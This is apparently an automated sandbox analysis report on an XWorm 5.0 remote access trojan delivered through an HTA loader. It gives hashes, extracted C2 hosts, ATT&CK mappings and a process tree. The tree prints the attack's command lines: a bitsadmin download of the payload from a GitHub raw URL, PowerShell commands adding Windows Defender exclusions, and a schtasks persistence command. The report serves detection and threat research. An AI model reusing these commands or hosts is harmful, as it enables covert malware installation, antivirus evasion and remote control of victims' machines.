xworm | 354d082858bfc5e24133854ff14bb2e89bc16e1b010b9d3372c8370d3144cdb9

General

Target

tarksloader.hta
Size

944B
MD5

cc3c0e6f75302fb6c2d9b5e7f487efe8
SHA1

aa94427fcc50b727fa22914292ea5c95755823d9
SHA256

354d082858bfc5e24133854ff14bb2e89bc16e1b010b9d3372c8370d3144cdb9
SHA512

24f7550776de67d94311840a68fd0f0d0041c9b2035b47899739ffbdb7c1c83281f8c3cfbf6884ad214b74f6bbb386565b4a1836e7bad1f88e661a940b8c304b

Score

10^/10

xworm discovery dropper execution persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

142.147.96.74:7000

buinhatduy01.ddns.net:7000

buinhatduy.duckdns.org:7000

Mutex

O9hqaPBmS3qVW6ON

Attributes

Install_directory
%AppData%
install_file
AggregatorHost.exe

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/memory/2192-1-0x0000000000BE0000-0x0000000000BF0000-memory.dmp	family_xworm
behavioral2/files/0x001300000001e6cc-54.dat	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4820	powershell.exe
3364	powershell.exe
3028	powershell.exe
4208	powershell.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
2772	bitsadmin.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
32	4936	Process not Found

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	mshta.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSessionUpdate.lnk	system.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSessionUpdate.lnk	system.exe

Executes dropped EXE 2 IoCs

pid	Process
2244	WindowsSessionUpdate
452	WindowsSessionUpdate

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsSessionUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsSessionUpdate"	system.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
31	raw.githubusercontent.com
32	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4364	schtasks.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
4820	powershell.exe
4820	powershell.exe
3364	powershell.exe
3364	powershell.exe
3028	powershell.exe
3028	powershell.exe
4208	powershell.exe
4208	powershell.exe
2192	system.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	2192	system.exe
Token: SeDebugPrivilege	4820	powershell.exe
Token: SeDebugPrivilege	3364	powershell.exe
Token: SeDebugPrivilege	3028	powershell.exe
Token: SeDebugPrivilege	4208	powershell.exe
Token: SeDebugPrivilege	2192	system.exe
Token: SeDebugPrivilege	2244	WindowsSessionUpdate
Token: SeDebugPrivilege	452	WindowsSessionUpdate

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2192	system.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2236 wrote to memory of 2772	2236	mshta.exe	88
PID 2236 wrote to memory of 2772	2236	mshta.exe	88
PID 2236 wrote to memory of 2772	2236	mshta.exe	88
PID 2236 wrote to memory of 2192	2236	mshta.exe	100
PID 2236 wrote to memory of 2192	2236	mshta.exe	100
PID 2192 wrote to memory of 4820	2192	system.exe	101
PID 2192 wrote to memory of 4820	2192	system.exe	101
PID 2192 wrote to memory of 3364	2192	system.exe	103
PID 2192 wrote to memory of 3364	2192	system.exe	103
PID 2192 wrote to memory of 3028	2192	system.exe	105
PID 2192 wrote to memory of 3028	2192	system.exe	105
PID 2192 wrote to memory of 4208	2192	system.exe	107
PID 2192 wrote to memory of 4208	2192	system.exe	107
PID 2192 wrote to memory of 4364	2192	system.exe	109
PID 2192 wrote to memory of 4364	2192	system.exe	109

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\tarksloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2236
- C:\Windows\SysWOW64\bitsadmin.exe
  "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/ruthmooregmuax/ruthmooregmuax/raw/refs/heads/main/system.exe C:\Users\Admin\AppData\Local\Temp\system.exe
  2⤵
  - Download via BitsAdmin
  - System Location Discovery: System Language Discovery
  PID:2772
- C:\Users\Admin\AppData\Local\Temp\system.exe
  "C:\Users\Admin\AppData\Local\Temp\system.exe"
  2⤵
  - Drops startup file
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2192
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\system.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4820
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3364
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3028
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsSessionUpdate'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4208
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsSessionUpdate" /tr "C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4364

C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate
C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2244

C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate
C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:452

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

BITS Jobs

1

T1197

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

BITS Jobs

Modify Registry

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WindowsSessionUpdate.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
5c56bc9516ee1aeea75a81d98481ee92

SHA1
1713f6c42d50fb29d62fc9af9732ddba5ec1d264

SHA256
4289eb4ee8622c15b6257056e3db539193204c38f5508c2e1e776676177fea5f

SHA512
be6af08ee11cd4d95aeb0badc2464207232c9de40b18b077e5b4070b245b494147667e9245ca49e9d51b527d5cb7d550eb7bf1ec20cc679fa9ad95ab9e31da31

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1226cbe1b9180c106bb1c6df4c56e023

SHA1
b42e0f4e40a8713c0300a8852d7c2a5690e03bbc

SHA256
413900875971fd21b31b0613362ef890e03901dca5bc6d9a2754bf5358d92a7f

SHA512
01caa250c5a3d68cd6dfb9ab3d97c6681aa3f004f1a23fb64dccc74c509a4c6a65fdc7c26d55ff84c1f5d34a91193b697f0834be6059c9bb381c5209033f75bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
c08aea9c78561a5f00398a723fdf2925

SHA1
2c880cbb5d02169a86bb9517ce2a0184cb177c6e

SHA256
63d2688b92da4d1bb69980b7998b9be1595dd9e53951434a9414d019c4f825a7

SHA512
d30db2f55bbda7102ffe90520d233355633313dcc77cdb69a26fdbb56e59dd41793def23d69dc5dc3f94c5bd41d3c26b3628886fd2edbed2df0b332e9a21f95c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4erd4pwt.gas.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate

Filesize
40KB

MD5
ba061861481a48da1ae6efb1c678f26c

SHA1
16089c304dc7b702e250ac9c8b8cfc61812c7a21

SHA256
90bfa328b18828073b2ea5d1c3151a5606cb55b26c7660e5ce53a0b9dfc7c0b6

SHA512
67f45fd0897bc591177acedb95fb250c093163a6ef5bba8430c105ce10d48340f33c3fd7d190d468aab6fca2f5d1d155e9f375e4f0552865ebe7677ac8aeb428

Download Submit
memory/2192-0-0x00007FF9D82C3000-0x00007FF9D82C5000-memory.dmp

Filesize
8KB

Download
memory/2192-51-0x00007FF9D82C0000-0x00007FF9D8D81000-memory.dmp

Filesize
10.8MB

Download
memory/2192-52-0x00007FF9D82C3000-0x00007FF9D82C5000-memory.dmp

Filesize
8KB

Download
memory/2192-53-0x00007FF9D82C0000-0x00007FF9D8D81000-memory.dmp

Filesize
10.8MB

Download
memory/2192-1-0x0000000000BE0000-0x0000000000BF0000-memory.dmp

Filesize
64KB

Download
memory/2192-60-0x0000000002F00000-0x0000000002F0C000-memory.dmp

Filesize
48KB

Download
memory/4820-2-0x0000023C45A00000-0x0000023C45A22000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads